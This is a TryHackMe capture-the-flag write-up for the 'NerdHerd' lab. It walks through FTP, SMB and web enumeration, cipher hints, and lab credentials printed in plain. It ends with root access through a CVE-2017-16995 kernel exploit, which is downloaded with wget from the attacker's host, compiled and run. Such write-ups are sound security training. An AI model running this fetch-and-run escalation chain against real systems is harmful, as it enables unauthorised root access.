TryHackMe - NerdHerd
Hack your way into this easy/medium level legendary TV series "Chuck" themed box!
| Title | NerdHerd |
|---|---|
| Difficulty | Medium |
| Authors | 0xpr0N3rd |
| Tags | ctf, challenge, ftp, smb, encryption |
Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate 5000 nerdherd.thm
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-27 22:40 EST
Warning: 10.10.86.80 giving up on port because retransmission cap hit (10).
Nmap scan report for nerdherd.thm (10.10.86.80)
Host is up (0.30s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 35.20 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -A -sV -Pn -p 21,22,139,445,1337 nerdherd.thm
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-27 22:42 EST
Nmap scan report for nerdherd.thm (10.10.86.80)
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.63.75
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 pub
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 0c841b36b2a2e111dd6aef427b0dbb43 (RSA)
| 256 e25d9ee728ead3ddd4cc2086a3df23b8 (ECDSA)
|_ 256 ecbe237ba94c2185bca8db0e7c39de49 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1337/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (98%), Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: NERDHERD; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -40m01s, deviation: 1h09m16s, median: -2s
|_nbstat: NetBIOS name: NERDHERD, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2023-12-28T03:42:46
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: nerdherd
| NetBIOS computer name: NERDHERD\x00
| Domain name: \x00
| FQDN: nerdherd
|_ System time: 2023-12-28T05:42:46+02:00
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 256.25 ms 10.9.0.1
2 268.14 ms nerdherd.thm (10.10.86.80)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.74 seconds
FTP (port 21)
Anonymous login is available on the FTP service:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ ftp nerdherd.thm
Connected to nerdherd.thm.
220 (vsFTPd 3.0.3)
Name (nerdherd.thm:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41799|)
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 .
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 ..
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 pub
226 Directory send OK.
Keep dig into the pub directory and explore a .png file with another sub-directory:
ftp> cd pub
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||42904|)
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 .
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 ..
drwxr-xr-x 2 ftp ftp 4096 Sep 14 2020 .jokesonyou
-rw-rw-r-- 1 ftp ftp 89894 Sep 11 2020 youfoundme.png
226 Directory send OK.
ftp> get youfoundme.png
local: youfoundme.png remote: youfoundme.png
229 Entering Extended Passive Mode (|||42534|)
150 Opening BINARY mode data connection for youfoundme.png (89894 bytes).
100% |*******| 89894 45.81 KiB/s 00:00 ETA
226 Transfer complete.
89894 bytes received in 00:02 (39.24 KiB/s)
Download the image file and keep continue with the rest directory:
ftp> cd .jokesonyou
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||49381|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Sep 14 2020 .
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 ..
-rw-r--r-- 1 ftp ftp 28 Sep 14 2020 hellon3rd.txt
226 Directory send OK.
ftp> get hellon3rd.txt
local: hellon3rd.txt remote: hellon3rd.txt
229 Entering Extended Passive Mode (|||42233|)
150 Opening BINARY mode data connection for hellon3rd.txt (28 bytes).
100% |*******| 28 156.25 KiB/s 00:00 ETA
226 Transfer complete.
28 bytes received in 00:00 (0.08 KiB/s)
Get the .txt file and back to local machine to analyze these evidences.
The .txt file includes a message that could be used as hint in the next few steps:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ cat hellon3rd.txt
all you need is in the leet
Next, with the image, display to see whether there is any text or hint on the image:
Using exiftool and determine the .png file is not a simple image file:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ exiftool youfoundme.png
ExifTool Version Number : 12.57
File Name : youfoundme.png
Directory : .
File Size : 90 kB
File Modification Date/Time : 2020:09:10 23:45:43-04:00
File Access Date/Time : 2023:12:27 23:44:20-05:00
File Inode Change Date/Time : 2023:12:27 23:44:20-05:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 894
Image Height : 894
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Background Color : 255 255 255
Pixels Per Unit X : 3543
Pixels Per Unit Y : 3543
Pixel Units : meters
Warning : [minor] Text/EXIF chunk(s) found after PNG IDAT (may be ignored by some readers)
Datecreate : 2010-10-26T08:00:31-07:00
Datemodify : 2010-10-26T08:00:31-07:00
Software : www.inkscape.org
EXIF Orientation : 1
Exif Byte Order : Big-endian (Motorola, MM)
Resolution Unit : inches
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
Flashpix Version : 0100
Owner Name : fijbxslz
Image Size : 894x894
Megapixels : 0.799
The “Owner Name” is a weird string and I think it could be a key for a encrypted or encoded string in this lab. So I keep it and move on.
SMB (port 139 + 445)
Currently, no anonymous login allowed:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ smbmap -u anonymous -H nerdherd.thm
[+] Guest session IP: nerdherd.thm:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
nerdherd_classified NO ACCESS Samba on Ubuntu
IPC$ NO ACCESS IPC Service (nerdherd server (Samba, Ubuntu))
I use nmap to enumerate the users on this system:
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script smb-enum-users -p 139,445 nerdherd.thm
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-28 01:28 EST
Nmap scan report for nerdherd.thm (10.10.86.80)
Host is up (0.30s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-users:
| NERDHERD\chuck (RID: 1000)
| Full name: ChuckBartowski
| Description:
|_ Flags: Normal user account
Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds
Now I’ve got the username:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ smbmap -u chuck -H nerdherd.thm
[!] Authentication error on nerdherd.thm
But do not have the password. Let it here and I will comeback later.
Port 1337
Access port 1337 on web-browser and an alert window pop-up on my screen:
These 2 alerts must be handled by a block of <script>, press Ctrl + U to view the page source and found the alert function at the end:
<body onload="alertFunc()">
<script>
function alertFunc() {
alert("HACKED by 0xpr0N3rd");
alert("Just kidding silly.. I left something in here for you to find")
}
</script>
<p>Maybe the answer is in <a href="https://www.youtube.com/watch?v=9Gc4QTqslN4">here</a>.</p>
A message seems like hint at the last line. But as the previous rooms that I’ve done, it’s just a common trick from the author:
Using curl to rapidly retrieve all the comments from the HTML source code and I receive these messages:
<!--
hmm, wonder what i hide here?
-->
[--snipped--]
<!--
maybe nothing? :)
-->
[--snipped--]
<!--
keep digging, mister/ma'am
-->
So I guess I so move on within different way.
Fuzzing (port 1337)
/.htpasswd (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/admin (Status: 301) [Size: 319] [--> http://nerdherd.thm:1337/admin/]
/index.html (Status: 200) [Size: 11755]
Using gobuster with only common.txt wordlist, I discovered an interesting sub-path - /admin:
Before trying to log in or brute-force the credentials, I decide to check the HTML source code again and luckily get this:
<!--
these might help:
Y2liYXJ0b3dza2k= : aGVoZWdvdTwdasddHlvdQ==
-->
Decode the first part with base64 gives me a string that could be the username:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ echo "Y2liYXJ0b3dza2k=" | base64 -d
cibartowski
But the second part does not:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ echo "aGVoZWdvdTwdasddHlvdQ==" | base64 -d
hehegou<j�][�base64: invalid input
I try to input a random credentials into the Login Form and send the request, then I notice the request has been changed to this form:
http://nerdherd.thm:1337/admin/?email=cibartowski&pass=passwd
I guess the parameters email and pass might injectable with SQL Injection. So I use sqlmap to check it out but:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ sqlmap -u "http://nerdherd.thm:1337/?email=1&pass=1" --batch -dbs --level 3 --risk 3
[--snipped--]
[WARNING] GET parameter 'email' does not seem to be injectable
[WARNING] GET parameter 'pass' does not seem to be injectable
[--snipped--]
Hmmm… It seems like I’ve missed something. I get back and do a couple of things:
- Fuzz the target URL with bigger directory: Nothing new
- Look at the enumeration on FTP service: the note
hellon3rd.txtand the information of.pngfile fromexiftool—> The “Owner Name”fijbxslz
Googling the string on the internet and discover it is related to The Vigenère cipher. I use it and try to decrypt the previous string but nothing worked:
Then, it must be the ciphertext but the question is “What is the key?”. Let’s get back to the HTML source code from the first page on port 1337:
<p>Maybe the answer is in <a href="https://www.youtube.com/watch?v=9Gc4QTqslN4">here</a>.</p>
I carefully listen to the music from the Youtube Video and realize there is a word that is kept repeated time to time. I searching for the lyrics and here is it:
A-well-a everybody's heard about the bird
B-b-b-bird, b-birdd's the word
A-well, a bird, bird, bird, bird is the word
A-well, a bird, bird, bird, well-a bird is the word
A-well, a bird, bird, bird, b-bird's the word
A-well, a bird, bird, bird, well-a bird is the word
A-well, a bird, bird, b-bird is the word
A-well, a bird, bird, bird, b-bird's the word
[--snipped--]
bird !! Let’s try it:
The result is more meaningful now. Try a little bit more!
Boom! I got this! Now, how could I use it? Remember the Authentication Failed of the SMB service, I try to put it in as the password:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ smbmap -u chuck -p [REDACTED] -H nerdherd.thm
[+] IP: nerdherd.thm:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
nerdherd_classified READ ONLY Samba on Ubuntu
IPC$ NO ACCESS IPC Service (nerdherd server (Samba, Ubuntu))
Aha!! There it is! Now I use smbclient to connect to the Shared Disk and download the helpful information on it:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ smbclient \\\\nerdherd.thm\\nerdherd_classified -U chuck%[REDACTED]
Try "help" to get a list of possible commands.
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> ls
. D 0 Thu Sep 10 21:29:53 2020
.. D 0 Thu Nov 5 15:44:40 2020
secr3t.txt N 125 Thu Sep 10 21:29:53 2020
8124856 blocks of size 1024. 3325768 blocks available
smb: \> get secr3t.txt
getting file \secr3t.txt of size 125 as secr3t.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
And the content of secr3t.txt:
Ssssh! don't tell this anyone because you deserved it this far:
check out "/this1sn0tadirect0ry"
Sincerely,
0xpr0N3rd
<3
Access the hidden directory and I get a creds.txt file:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ wget http://nerdherd.thm:1337/this1sn0tadirect0ry/creds.txt
--2023-12-28 01:44:47-- http://nerdherd.thm:1337/this1sn0tadirect0ry/creds.txt
Resolving nerdherd.thm (nerdherd.thm)... 10.10.86.80
Connecting to nerdherd.thm (nerdherd.thm)|10.10.86.80|:1337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84 [text/plain]
Saving to: ‘creds.txt’
creds.txt 100%[==============================================>] 84 --.-KB/s in 0s
2023-12-28 01:44:47 (11.5 MB/s) - ‘creds.txt’ saved [84/84]
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ cat creds.txt
alright, enough with the games.
here, take my ssh creds:
chuck : th1s41ntmypa5s
Gain Access
After login SSH to the target machine with the above credentials, I easily get the user flag:
chuck@nerdherd:~$ ls -l
total 52
drwxr-xr-x 2 chuck chuck 4096 Kas 5 2020 Desktop
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Documents
drwxr-xr-x 3 chuck chuck 4096 Eyl 11 2020 Downloads
-rw-r--r-- 1 chuck chuck 8980 Eyl 11 2020 examples.desktop
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Music
drwxr-xr-x 2 root root 4096 Eyl 11 2020 nerdherd_classified
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Pictures
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Public
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Templates
-rw-rw-r-- 1 chuck chuck 46 Eyl 14 2020 user.txt
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Videos
chuck@nerdherd:~$ cat user.txt
THM{REDACTED}
Vertical Privilege Escalation
Even the current user chuck is in the sudo group 27(sudo), I still cannot using the sudo command:
chuck@nerdherd:~$ id
uid=1000(chuck) gid=1000(chuck) groups=1000(chuck),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
chuck@nerdherd:~$ sudo -l
[sudo] password for chuck:
Sorry, user chuck may not run sudo on nerdherd.
From the error message, it seems like the current user is restricted from this host.
Then the 2 common privesc ways I usually use are:
- Finding
SUIDfiles/services: took too long for the response - Finding Capabilties: return nothing helpful
chuck@nerdherd:~$ hostnamectl
Static hostname: nerdherd
Icon name: computer-vm
Chassis: vm
Machine ID: f91fe3b517c94d8b987dedf05d38cfbc
Boot ID: 9fb95f5287694a7eb2fbe506e25d47fa
Virtualization: xen
Operating System: Ubuntu 16.04.1 LTS
Kernel: Linux 4.4.0-31-generic
Architecture: x86-64
Look at the Kernel version! It is out-of-date which is 4.4.0. There is a cve-2017-16995 exploit this version and is able to **Locally Escalate Privilege** from this source. I create the exploit file on my local machine and then transfer it to the target system:
chuck@nerdherd:~$ ls -l pwn.c
-rw-rw-r-- 1 chuck chuck 28376 Ara 28 09:13 pwn.c
chuck@nerdherd:~$ wget http://10.9.63.75:8000/pwn.c
--2023-12-28 09:23:23-- http://10.9.63.75:8000/pwn.c
Connecting to 10.9.63.75:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13248 (13K) [text/x-csrc]
Saving to: ‘pwn.c’
pwn.c 100%[==============================================>] 12,94K 40,9KB/s in 0,3s
2023-12-28 09:23:24 (40,9 KB/s) - ‘pwn.c’ saved [13248/13248]
chuck@nerdherd:~$ gcc pwn.c -o pwn
chuck@nerdherd:~$ ls -l pwn
-rwxrwxr-x 1 chuck chuck 18432 Ara 28 09:23 pwn
chuck@nerdherd:~$ ./pwn
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880007fa4300
[*] Leaking sock struct from ffff880005ef1e00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880007facc00
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880007facc00
[*] credentials patched, launching shell...
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),1000(chuck)
As general, I navigate to the /root directory and find the root.txt file. However, it is not the real flag:
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 62 Eyl 14 2020 root.txt
# cat root.txt
cmon, wouldnt it be too easy if i place the root flag here?
Then I list all the hidden files in the current place and check for the history bash and figure out the bonus flag:
[--snipped--]
cp youfoundme.png /home/chuck/Desktop/
ls -la
rm youfoundme.png
THM{REDACTED}
mv /home/chuck/Downloads/youfoundme.png .
rm youfoundme.png
[--snipped--]
And another interesting thing:
[--snipped--]
pwd
rm .bash_history
wget http://22.0.97.17/.bash_history
ls -la
cat .bash_history
[--snipped--]
However, the mentioned IP Address cannot be connected. Therefore, I decide to use command find to search for the flag with the pattern “THM{”:
find / -type f -exec grep -H "THM{" {} + 2>/dev/null
Unfortunately, the response took too long. So I decide to modify the command line within specify the date which is related to the previous flag:
-rw-rw-r-- 1 chuck chuck 46 Eyl 14 2020 user.txt
-rw-r--r-- 1 root root 62 Eyl 14 2020 root.txt
The Eyl indicates the month September in Turkish (Googling). So the date should be specified is 2020-09-14.
The command line would be:
find / -type f -newermt "2020-09-14" -exec grep -H "THM{" {} + 2>/dev/null
Sadly, it did not work and took me for an hour on waiting. Then I change my mind and look for the file name:
find / -type f -name "*root*"
and I figure out this one:
[--snipped--]
/etc/init.d/checkroot-bootclean.sh
/etc/init.d/checkroot.sh
/sbin/pivot_root
/sbin/switch_root
/root/root.txt
{REDACTED}
/lib/x86_64-linux-gnu/security/pam_rootok.so
/lib/systemd/system/initrd-switch-root.target
[--snipped--]
And I get the root flag:
# cat /opt/.root.txt
nOOt nOOt! you've found the real flag, congratz!
THM{REDACTED}